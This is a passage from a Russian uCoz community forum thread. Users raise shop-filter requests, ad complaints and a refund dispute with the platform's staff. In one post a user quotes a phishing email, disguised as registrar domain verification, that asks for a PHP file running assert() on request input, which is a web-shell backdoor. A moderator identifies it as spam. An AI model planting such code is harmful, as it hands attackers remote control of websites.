Модератор форума: Shеriff, Yuri_G  
Сообщество uCoz » Общение пользователей » Разговоры про uCoz » Топик общения с руководством
Топик общения с руководством
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 496 | 13:00:46
boom-hacker, запрос о переносе сайта на uID аккаунт отправлен. Ожидается подтверждение от получателя на странице https://ucoz.ru/login.

Будущему владельцу сайта , необходимо авторизироваться на главной странице ucoz.ru
При входе, Будущему владельцу сайта , будет показано окно

Нужно нажать на кнопку Принять. После чего, внизу, принятый сайт отобразится в списке сайтов
Сразу после передачи, новый владелец сможет один раз войти в панель управления нового сайта без ввода пароля

Переданный сайт автоматически наследует от uID:
Пароль администратора uID (пароль от панели управления сайтом)
Секретный вопрос и ответ
Контактный адрес электронной почты для сайта и почтовых форм необходимо изменить в соответствующих разделах.

Примите наши извинения за доставленные неудобства.
Эндрю
Сообщений: 29
Репутация: 40

Сообщение # 497 | 05:25:09
Доброе утро!
Команда ucoz это в первую очередь люди и мы владельцы тоже люди и не можем сразу все предусмотреть как собственно и Вы, поэтому Вас и понимаем, но вместе дорабатывать систему, ведь нет предела совершенству
Хотелось бы внести свою лепту в развитие модуль (интернет-магазин), путем выявленного слабого места в (фильтр товаров-спецификация). На скриншотах все подробно расписано, надеюсь после прочтения информации команда ucoz поймет, что без данной гибкости развитие (интернет магазин) владельцем возможно только путем удаления и создания нового (фильтр-спецификация) или изначально все предусмотреть, что собственно невозможно.
P.S. собственно лично сейчас столкнулся с этой проблемой. Рыскал по многим интернет магазинам и их движкам, другими воплощено в жизнь.
Прикрепления: 4324070.png (483.4 Kb) · 4116349.png (190.7 Kb)
Сообщение отредактировал Эндрю - Среда, 02 Авг 2017, 05:46:09
sergeymitrichev
Сообщений: 1976
Репутация: 409

Сообщение # 498 | 11:46:15
Эндрю, спасибо за предложение и подробные скриншоты. Действительно не очень удобно, когда нет возможности расставить или отсортировать значения спецификации. Подумаем, как это можно исправить.

Эндрю
Сообщений: 29
Репутация: 40

Сообщение # 499 | 12:35:55
sergeymitrichev, тут даже дело не в удобстве. Дело в переделывании всей работы, которая была ранее проделана, а изначально предвидеть все характеристики не возможно. Сам сейчас по закрытому форуму для владельцев лазил и перешел на сайт шампуней и увидел что пару вещей можно добавить к себе только под посуду и встал вопрос, что вставить это не куда, если только системно внизу и так периодически натыкаешься. Серьезное характеристики товара, влияют на клиента в +. Да и не забываем, что производители вносят новшество и тогда оно тоже будет располагаться все ниже и ниже, хотя их нужно расположить туда где им место быть.

Есть у меня еще одно предложение, стоит взять на заметку и попробывать выполнить.
Прикрепления: 2932172.png (242.7 Kb)
Сообщение отредактировал Эндрю - Среда, 02 Авг 2017, 12:37:05
sergeymitrichev
Сообщений: 1976
Репутация: 409

Сообщение # 500 | 12:58:36
Эндрю, для предложений у нас есть all.uwishlist.ru. Можно добавлять свои идеи туда, заодно посмотреть, что предлагают другие пользователи.

Drinko
Сообщений: 909
Репутация: 773

Сообщение # 501 | 16:30:44
Цитата sergeymitrichev ()
для предложений у нас есть all.uwishlist.ru

Толку от него ровно ноль - самые востребованные предложения полностью игнорируются, остальное либо делается для галочки или же вообще не делается, хоть и ставят пометку "Выполнено".

Олег9124
Сообщений: 4
Репутация: 0

Сообщение # 502 | 20:23:28
Писать в тему о тупой рекламе уже нет смысла.
Многие пишут и я писал даже целые темы открывал, всё благополучно удалено и всё впустую.
Ничего не меняется. Мы многое терпели.
Пока я бодаюсь с другим конструктором. Тут, на укозе ещё не закончился мой простенький сайтик. http://obereg.my1.ru/
Многих и меня удивляет такое халтурное отношение к пользователям. И зачем вам нужна такая реклама? Вы хотите изжить всех?
Если вы не можете справиться с своими обещаниями на бесплатном сайте, то каким же надо быть дураком, чтобы вам начать платить деньги?
Прикрепления: 4392913.jpg (134.6 Kb) · 0825559.jpg (135.7 Kb)
Олег9124
Сообщений: 4
Репутация: 0

Сообщение # 503 | 20:33:45
Реклама откровенно гадит пользователю на нервы. И эта же реклама предлагает ему воспользоваться вашими услугами.
Умиляет ваш чудо баннер: создать сайт!
Он появляется на каждой страничке и говорит: Ты тупой! и уже забыл! я тебе напоминаю: создай сайт!!!
Прикрепления: 8740862.jpg (22.7 Kb)
Stevie_G
Сообщений: 48
Репутация: 3

Сообщение # 504 | 16:57:07
Сегодня случайно зашёл а почтовый ящик, на котором зарегистрирован как администратор домена http://liverpool-fan.ru/
И обнаружил там письмо от info@nic.ru аж от 23 мая 2017 г. следующего содержания
Уважаемый клиент!

В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем liverpool-fan.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл a17vfsji18kp1cxm.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего уведомления и находиться на сервере до 8 июня 2017 года, 12:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

Во-первых, раньше такого не было
Во-вторых смехотворно малый срок
В-третьих, система просто не даёт сохранить файл с таким именем пишет "имя a17vfsji18kp1cxm.php является системным"
В четвёртых - сайт до сих пор работает - ничего не произошло....

ВОПРОС.... Что делать? Домен я регистрировал и продлеваю всегда с вашей помощью .... sad

Добавлено (28 Авг 2017, 16:57:07)
Сообщение отредактировал Stevie_G - Понедельник, 28 Авг 2017, 17:16:22
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 505 | 18:16:16
Stevie_G, это спам и не нужно ничего добавлять. Обращайте внимание на служебные заголовки, которые покажут, откуда на самом деле оно пришло.
Служебные заголовки содержат различную техническую информацию (серверы, через которые проходило письмо, данные о почтовом клиенте отправителя, результаты проверки антивирусом) и позволяют провести детальный анализ писем.
Дополнительную информацию о структуре письма вы можете получить на странице «Электронная почта» Википедии. Для просмотра служебных заголовков писем в интерфейсах популярных почтовых клиентов или почтовых сервисов воспользуйтесь следующими инструкциями //forum.ucoz.ru/forum/45-59689-1#1121600


Также ознакомьтесь с темами форума:
//forum.ucoz.ru/forum/77-88768-1296069-16-1482145407
//forum.ucoz.ru/forum/45-89400-1#1304762
Stevie_G
Сообщений: 48
Репутация: 3

Сообщение # 506 | 10:34:15
Спасибо $Vladimir$ smile
Эндрю
Сообщений: 29
Репутация: 40

Сообщение # 507 | 18:26:23
Цитата sergeymitrichev ()
Эндрю, для предложений у нас есть all.uwishlist.ru. Можно добавлять свои идеи туда, заодно посмотреть, что предлагают другие пользователи.
Добрый вечер!

А смысл туда писать?! Фильтры были созданы и если изначально не предусмотрели все детали (посмотреть как у конкурентов), то надо просто брать их и дорабатывать. Писанина на доработку в all.uwishlist.ru это годы ожидания нашей жизни, поэтому мной написано в данный топик, для обращения взгляда руководства на проблемы которые можно и нужно устранить.
На скринах еще детали упущенные изначально
Прикрепления: 7937058.png (92.2 Kb) · 9608959.png (403.4 Kb)
kruiz
Репутация: 0

Сообщение # 508 | 12:30:06
Здравствуйте!
Если у компании Юкоз всё так плохо с финансами, зачем тогда объявлять об акции и всяческим способами (не отвечать по 2-е суток, предъявлять какие-то совсем уж придуманные требования) бодаться со мной за эти 20 долларов. Не скрою для меня это значительная сумма, но с вашей стороны всё это выглядит жалко и мелочно...
Переписка со службой поддержки
Styler
Сообщений: 455
Репутация: 155

Сообщение # 509 | 15:32:15
kruiz, здравствуйте!

У службы технической поддержки есть определенные регламенты действий для определенных ситуаций. Особенно это касается финансовых вопросов, в том числе и перевода средств между сайтами.

Как правило, вопрос перевода средств между сайтами, находящимися в одном UID-аккаунте решается по упрощенной процедуре, по заявке от владельца. Но, иногда требуются дополнительные проверки того, что запрос на перевод был инициирован действительно владельцем сайта. Это делается с единственной целью - уберечь пользователя от несанкционированного перевода его средств.

В ситуации, которая описана Вами в заявке в службу поддержки, в дополнительных проверках действительно не было никакой необходимости.

На данный момент средства уже переведены.

Приношу Вам свои извинения за задержку с решением вопроса.


Не оказываю техническую поддержку через систему личных сообщений!
zarim
Сообщений: 489
Репутация: 82
Уровень замечаний:

Сообщение # 510 | 15:44:18
kruiz, а что сложного предоставить скрин операции по вебмани? хотя не скрою, у меня тоже были проблемы с переводом денег с одного моего сайта на другой (все были в одной ПУ)
Сообщество uCoz » Общение пользователей » Разговоры про uCoz » Топик общения с руководством
Поиск: